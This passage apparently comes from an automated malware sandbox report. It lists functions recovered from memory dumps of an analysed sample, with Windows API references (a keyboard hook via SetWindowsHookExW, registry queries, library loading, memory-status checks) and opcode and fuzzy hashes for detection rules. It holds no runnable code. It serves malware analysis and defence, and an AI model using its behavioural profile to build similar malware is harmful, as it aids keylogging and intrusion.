                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: 7790b0a834a0f906067bebb747368f84b83c4f9c604a8e5e03275c62d2545275
                                                                                              • Instruction ID: c98c8ef85697c1b75a5c2235facdeee792609795501724949cd9ac5defd55926
                                                                                              • Opcode Fuzzy Hash: 7790b0a834a0f906067bebb747368f84b83c4f9c604a8e5e03275c62d2545275
                                                                                              • Instruction Fuzzy Hash: 22222C74A14228CFCB65EF34C8987ADB7BAAF88205F1085E9D909A3350DF749E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250ED7, Relevance: 5.0, APIs: 3, Instructions: 476libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: 7272c986b4b25235f04189f710bad51a6e890e4839334722a5b568b64f9c29af
                                                                                              • Instruction ID: 1a88e2842ac3e87fc760fc0e6ffbb1a89bfb6ff91e7b55ba4c02dd7b67a60d86
                                                                                              • Opcode Fuzzy Hash: 7272c986b4b25235f04189f710bad51a6e890e4839334722a5b568b64f9c29af
                                                                                              • Instruction Fuzzy Hash: 76222D74A14228CFCB65EF34C8987ADB7BAAF88205F1085E9D909A3350DF749E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250F1C, Relevance: 5.0, APIs: 3, Instructions: 469libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: 432f6db77d29101b5acfff7056d3454efd947ab95d2674c0c08a3c2fb9f1fc74
                                                                                              • Instruction ID: 53d60cf749b0fb9d505c8fceec690813ce1de8e13c3cbe13d2df4bd5561daa05
                                                                                              • Opcode Fuzzy Hash: 432f6db77d29101b5acfff7056d3454efd947ab95d2674c0c08a3c2fb9f1fc74
                                                                                              • Instruction Fuzzy Hash: 9F222D74A14228CFCB65EF34C8987ADB7BAAF88205F1085E9D909A3350DF749E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250F61, Relevance: 5.0, APIs: 3, Instructions: 462libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: ac9abc03b24d6e1b2d7b8a096986c7b90c813c430e8af567b04d151f0b5d2432
                                                                                              • Instruction ID: 2365254175eadea1377309eb9aaf96d94ec1cdafd6441eb4ca7dbb08cf0f8ad7
                                                                                              • Opcode Fuzzy Hash: ac9abc03b24d6e1b2d7b8a096986c7b90c813c430e8af567b04d151f0b5d2432
                                                                                              • Instruction Fuzzy Hash: A4221D74A14228CFCB65EF34C8987ADB7BAAF88205F1085E9D609A3350DF749E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250FA6, Relevance: 5.0, APIs: 3, Instructions: 455libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: b0063271df069d38c444e6d6c09c7a8c86ba5cbb0830be8cf9fcf0becf0e5387
                                                                                              • Instruction ID: 252b1e4140defa18282f6479b554f62302cc0511edb7b6d16a24653e7689095b
                                                                                              • Opcode Fuzzy Hash: b0063271df069d38c444e6d6c09c7a8c86ba5cbb0830be8cf9fcf0becf0e5387
                                                                                              • Instruction Fuzzy Hash: 74222D74A14228CFCB65EF34C8987ADB7BAAF88205F1085E9D609A3350DF349E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01251001, Relevance: 3.4, APIs: 2, Instructions: 444libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionInitializeThunkUser
                                                                                              • String ID:
                                                                                              • API String ID: 243558500-0
                                                                                              • Opcode ID: 521741c6dcad2e5d5a8bf4c6d250235673d64a028ee0d3f5dda84e4b9bfc5b44
                                                                                              • Instruction ID: 4cce8f9dbdf15b5eca0d877ae9fe5c6ea4c9b2a87e4503138b7daecd144e5108
                                                                                              • Opcode Fuzzy Hash: 521741c6dcad2e5d5a8bf4c6d250235673d64a028ee0d3f5dda84e4b9bfc5b44
                                                                                              • Instruction Fuzzy Hash: 03122D74A14228CFCB65EF34C8987ADB7BAAF88205F1085E9D609A3350DF349E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01251046, Relevance: 3.4, APIs: 2, Instructions: 437libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionInitializeThunkUser
                                                                                              • String ID:
                                                                                              • API String ID: 243558500-0
                                                                                              • Opcode ID: 9f950d8a3033ad4289cbee9c3b5ea45fa62612563a98421ff47fcfb9e43710ad
                                                                                              • Instruction ID: bb04824f577fab65b13a2697f432ef08b9052c23ef56136dedb6c105697f6e38
                                                                                              • Opcode Fuzzy Hash: 9f950d8a3033ad4289cbee9c3b5ea45fa62612563a98421ff47fcfb9e43710ad
                                                                                              • Instruction Fuzzy Hash: 34122C74A14229CFCB65EF34C8987ADB7BAAF88205F1085E9D609A3350DF349E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0125108B, Relevance: 3.4, APIs: 2, Instructions: 430libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionInitializeThunkUser
                                                                                              • String ID:
                                                                                              • API String ID: 243558500-0
                                                                                              • Opcode ID: 5116469cbcc7d1503bb911771641a636dac070c22cfc0957e013495aff1fa606
                                                                                              • Instruction ID: 71dceb06a190ea425e03196f6c77196df47b03fefa195961a5c9c783f8df1813
                                                                                              • Opcode Fuzzy Hash: 5116469cbcc7d1503bb911771641a636dac070c22cfc0957e013495aff1fa606
                                                                                              • Instruction Fuzzy Hash: AF121B74A14229CFCB65EF34C8987ADB7BAAF88205F1085E9D609A3350DF349E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 012510D3, Relevance: 3.4, APIs: 2, Instructions: 423libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionInitializeThunkUser
                                                                                              • String ID:
                                                                                              • API String ID: 243558500-0
                                                                                              • Opcode ID: 34055da53c4050b34873710bfd3077f944e1e58e77c33862f676659c66f8c02e
                                                                                              • Instruction ID: 823d937830540811a61a40f359b2eab5991c10adac3b50f473375a92aec7c948
                                                                                              • Opcode Fuzzy Hash: 34055da53c4050b34873710bfd3077f944e1e58e77c33862f676659c66f8c02e
                                                                                              • Instruction Fuzzy Hash: A6122C74A14229CFCB65EF34C8987ADB7BAAF88205F1085E9D609A3350DF349E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0125111B, Relevance: 3.4, APIs: 2, Instructions: 416libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionInitializeThunkUser
                                                                                              • String ID:
                                                                                              • API String ID: 243558500-0
                                                                                              • Opcode ID: a6eecb838689cd023e8725bc227680dd7fc818f69e7679a6e99362241eb74d12
                                                                                              • Instruction ID: eb6aa9a1a4a0f417c3b1e34f87b3127b9adfbc97554c1a662565d6e6e229102b
                                                                                              • Opcode Fuzzy Hash: a6eecb838689cd023e8725bc227680dd7fc818f69e7679a6e99362241eb74d12
                                                                                              • Instruction Fuzzy Hash: 12022C74A14229CFCB65EF34C8987ADB7BAAF88205F1085E9D609A3350DF349E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01251163, Relevance: 3.4, APIs: 2, Instructions: 409libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionInitializeThunkUser
                                                                                              • String ID:
                                                                                              • API String ID: 243558500-0
                                                                                              • Opcode ID: 8a124f5f71a47bad3229f22c3ed6efe235306961854e9679b157d3db62dfbe61
                                                                                              • Instruction ID: ea00c85383caeae4e7d1e1ef887a2c677ac3da16326b931928ce73ea0a84b55a
                                                                                              • Opcode Fuzzy Hash: 8a124f5f71a47bad3229f22c3ed6efe235306961854e9679b157d3db62dfbe61
                                                                                              • Instruction Fuzzy Hash: 62023D74A14229CFCB65EF34C8987ADB7BAAF88205F1085E9D609A3350DF349E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0125160E, Relevance: 1.7, APIs: 1, Instructions: 237COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: 52ebe8981c6c9a9c2b906664b6ae664af9bd6a739b5e6579b6cb877433a059e4
                                                                                              • Instruction ID: dc25c808bbb4c45fa63389b35b8acb882c923c04b4c328a966004a7c5780ed36
                                                                                              • Opcode Fuzzy Hash: 52ebe8981c6c9a9c2b906664b6ae664af9bd6a739b5e6579b6cb877433a059e4
                                                                                              • Instruction Fuzzy Hash: 8BA160B4A14229CFCB65EF34C8947ADB7BAAF88205F1085E9D609A3740DF349E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01251656, Relevance: 1.7, APIs: 1, Instructions: 230COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: 4dd109ded7f76ce858396d4f1fce5127985a63d2e17a747db81eb38c5a349f84
                                                                                              • Instruction ID: 025f3b0c12ba4970ca8050d6bfdf4dfadab262d07939b9c3f6d3090b8619b4d2
                                                                                              • Opcode Fuzzy Hash: 4dd109ded7f76ce858396d4f1fce5127985a63d2e17a747db81eb38c5a349f84
                                                                                              • Instruction Fuzzy Hash: 1DA161B0A14229CFCB65EF34C8947ADB7BAAF88205F1085E9D609A3340DF349E85CF55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0125169E, Relevance: 1.7, APIs: 1, Instructions: 223COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: 8947bb124bd9720b56a2b57e928c865b709ff1ef998c0efd1be0687b105c0c33
                                                                                              • Instruction ID: 65f0d70a40438772070220994827892c61725e56a63e4ccb9cfce907e69d6513
                                                                                              • Opcode Fuzzy Hash: 8947bb124bd9720b56a2b57e928c865b709ff1ef998c0efd1be0687b105c0c33
                                                                                              • Instruction Fuzzy Hash: 94A16FB0A14229CFCB65EF34C8947ADB7BAAF88205F1085E9D609A3740DF349E85CF55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 012516FC, Relevance: 1.7, APIs: 1, Instructions: 212COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: feeedb1afe0cc2a215d26ab58519b58c1edb736d16e62592391c10b944ed1023
                                                                                              • Instruction ID: 0f2482d1308711c805f8abed66cb7ee15b59d4c4014c3a91913cbf5e9567680e
                                                                                              • Opcode Fuzzy Hash: feeedb1afe0cc2a215d26ab58519b58c1edb736d16e62592391c10b944ed1023
                                                                                              • Instruction Fuzzy Hash: 699160B0A14229CFCB65EB34C8947ADB7BAAF88205F1085E9D609A3740DF349E85CF55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 012F2E50, Relevance: 1.7, APIs: 1, Instructions: 205libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505569763.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 4a53f3db3416460b29b38a4ea8e794c0887937bc8297ce2eb1bda86485a3c8f3
                                                                                              • Instruction ID: 01def02a64312ab0ffcdd967a3b4be871288bc7535bc2c728980a3bb0617f278
                                                                                              • Opcode Fuzzy Hash: 4a53f3db3416460b29b38a4ea8e794c0887937bc8297ce2eb1bda86485a3c8f3
                                                                                              • Instruction Fuzzy Hash: 77715A30A20209DFDB14DBB8D9597AEBBF6AF85308F10853DD602A7351DF799845CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01251744, Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: 2578d6c83bb25f60b63733be0013534e0e94a85562fa46eb4f0789c901717626
                                                                                              • Instruction ID: 19610d05459e6b378febb3bc37c1ac4daf986c80a22b68ab202f016d5e4f6574
                                                                                              • Opcode Fuzzy Hash: 2578d6c83bb25f60b63733be0013534e0e94a85562fa46eb4f0789c901717626
                                                                                              • Instruction Fuzzy Hash: 4D9161B0A14229CFCB65EB34C8947ADB7B6EF88205F1085E9D609A3740DF349E85CF55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 012F7A28, Relevance: 1.6, APIs: 1, Instructions: 125COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505569763.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0f4c0acb7b1d654d39df022f265c7cf4280eee134ffb2d7e15fde601b65cdc75
                                                                                              • Instruction ID: 1179cc4e4c3e2395d1aa5a7cd36dec20f8eb65d3051beb5160bed6de79afac25
                                                                                              • Opcode Fuzzy Hash: 0f4c0acb7b1d654d39df022f265c7cf4280eee134ffb2d7e15fde601b65cdc75
                                                                                              • Instruction Fuzzy Hash: DC411272D043598FCB00CFA9C8146EEFBF1AF89214F1586BED604A7340DB389945CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 012F2848, Relevance: 1.6, APIs: 1, Instructions: 106registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 012F294C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505569763.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: 5f8280ba92c4397c1bc69562f6ca36fd7004f122eb8b4d444a0ca1e4b3b284ab
                                                                                              • Instruction ID: f16d851c12869f1abc5978d68fec0e39bb8c466987c5abfa654a61f459dca9e8
                                                                                              • Opcode Fuzzy Hash: 5f8280ba92c4397c1bc69562f6ca36fd7004f122eb8b4d444a0ca1e4b3b284ab
                                                                                              • Instruction Fuzzy Hash: 1D4147B0E04249CFDB00CFA9C544B9EFBF1AB49314F29C16EE608AB351D7759845CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 012F2AF4, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 012F2BB9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505569763.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: ead8c26bc9883589a0aa580cef0835abaac4fe1da4a0e25068356f4ee78557ac
                                                                                              • Instruction ID: 8ff8ecf5fb096c0d003bd90f106b77ce09b29d48e561e7bda124a2c12cf167f6
                                                                                              • Opcode Fuzzy Hash: ead8c26bc9883589a0aa580cef0835abaac4fe1da4a0e25068356f4ee78557ac
                                                                                              • Instruction Fuzzy Hash: 7C41FBB1D10259DFCB20CFA9C884ACEFBB1BB49304F15806EE919AB310D7309905CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 012F2B00, Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 012F2BB9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505569763.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: de6461733153347d091df23f83c387f38e52d76198f261257b632d856cfab710
                                                                                              • Instruction ID: 7dcebf8e75481c8d31139a2db42e35e2adcec198ade586cfd19b78f44e7ebcd3
                                                                                              • Opcode Fuzzy Hash: de6461733153347d091df23f83c387f38e52d76198f261257b632d856cfab710
                                                                                              • Instruction Fuzzy Hash: B431CAB1D10259DFCB10CF9AC984A9EFBF5BB49314F15802AE919AB310D7749945CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 012F8AE8, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 012F8B6B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505569763.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: HookWindows
                                                                                              • String ID:
                                                                                              • API String ID: 2559412058-0
                                                                                              • Opcode ID: ccb5fd585ab2874df37722c58fbf6b8053b1bb8ae96a0a8355f129fbbf867924
                                                                                              • Instruction ID: 9d0510931aef584d9b27016db23bb6a9a92677fb09ed6c517df55e72f7d9be06
                                                                                              • Opcode Fuzzy Hash: ccb5fd585ab2874df37722c58fbf6b8053b1bb8ae96a0a8355f129fbbf867924
                                                                                              • Instruction Fuzzy Hash: 302133B1D002098FCB10CF99C984BEEFBF1BB88324F14842AE519A7750DB74A945CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01240838, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,01241A79,00000800), ref: 01241B0A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505426232.0000000001240000.00000040.00000001.sdmp, Offset: 01240000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: a921fb3cb40f275b13c7d6f1a12dc47bed3ad714e183033fa12cb0da86e600b3
                                                                                              • Instruction ID: 9943df0f436dcb125bd9602c4de65c51ba19aa7a56b0a7a6608b5bb93078d8fd
                                                                                              • Opcode Fuzzy Hash: a921fb3cb40f275b13c7d6f1a12dc47bed3ad714e183033fa12cb0da86e600b3
                                                                                              • Instruction Fuzzy Hash: 2B1114B69042098FDB14CF9AC844BDEFBF4EB88314F14842AE515A7700D374A545CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 012F5858, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,012F7A7A), ref: 012F7B67
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505569763.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: GlobalMemoryStatus
                                                                                              • String ID:
                                                                                              • API String ID: 1890195054-0
                                                                                              • Opcode ID: d850399035cb98ece84b32f9f0ba14122f51ca7f0a776767a6ca8467536db3c6
                                                                                              • Instruction ID: 311da36e4d3f5a0f968c1b008b87aa247c673126823f7a645f98356e3786a98c
                                                                                              • Opcode Fuzzy Hash: d850399035cb98ece84b32f9f0ba14122f51ca7f0a776767a6ca8467536db3c6
                                                                                              • Instruction Fuzzy Hash: 7B1103B1C0461A9BCB10CF9AC844B9EFBF4AB49324F15856AD618A7240E378A954CFE5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01241A98, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,01241A79,00000800), ref: 01241B0A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505426232.0000000001240000.00000040.00000001.sdmp, Offset: 01240000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: c1b38c6b1609355ccd17c1f82abe894ed321358be16b513a8f4f92a54b161231
                                                                                              • Instruction ID: bdeaade5e679e836aac2f817199072feb9305b17bbad99fa70c233ccfd2bf36a
                                                                                              • Opcode Fuzzy Hash: c1b38c6b1609355ccd17c1f82abe894ed321358be16b513a8f4f92a54b161231
                                                                                              • Instruction Fuzzy Hash: 9D1123B69002098FDB14CF9AC984BDEFBF4AB88324F15842AD519B7710D378A545CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 012F7AF8, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,012F7A7A), ref: 012F7B67
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505569763.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: GlobalMemoryStatus
                                                                                              • String ID:
                                                                                              • API String ID: 1890195054-0
                                                                                              • Opcode ID: 7d99d4dc8c40d89df4d8ad4055f3abc92773111660638dbc1efff2bf1c5abecd
                                                                                              • Instruction ID: 0eb6af2b00d98a8594dbe4436cf9399cd08e0bbc5b6572a761ba108045433c52
                                                                                              • Opcode Fuzzy Hash: 7d99d4dc8c40d89df4d8ad4055f3abc92773111660638dbc1efff2bf1c5abecd
                                                                                              • Instruction Fuzzy Hash: 301133B1C0461A8FCB00CFAAC844B9EFBB0BF48324F05826AD518A3640D338A950CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions